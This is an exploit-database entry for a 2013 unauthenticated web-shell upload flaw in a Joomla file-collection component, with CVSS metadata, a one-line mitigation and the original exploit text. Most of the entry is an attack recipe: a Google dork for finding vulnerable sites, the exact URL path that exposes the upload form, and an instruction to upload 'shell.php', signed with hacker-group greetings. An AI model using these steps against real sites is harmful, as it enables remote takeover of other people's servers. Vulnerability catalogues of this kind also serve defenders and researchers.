Joomla com_collecter shell upload

vendor:

Joomla

by:

Red Dragon_al

7,5

CVSS

HIGH

Shell Upload

434

CWE

Product Name: Joomla

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2013

Joomla com_collecter shell upload

This exploit allows an attacker to upload a shell to a vulnerable Joomla website using the com_collector component. The attacker can use the Google dork [inurl:index.php?option=com_collector] to find vulnerable websites. The attacker can then add the part 'index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1' to the vulnerable website URL and upload a shell as 'shell.php'.

Mitigation:

Disable the com_collector component or upgrade to the latest version of Joomla.

Source

Exploit-DB raw data:

# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013

# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP

# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/

---------------------------------------
#      ~ Expl0itation ~      #
---------------------------------------

1- Google dork: [inurl:index.php?option=com_collector]

2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

upload ur shell as : shell.php


                                           
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.

#2013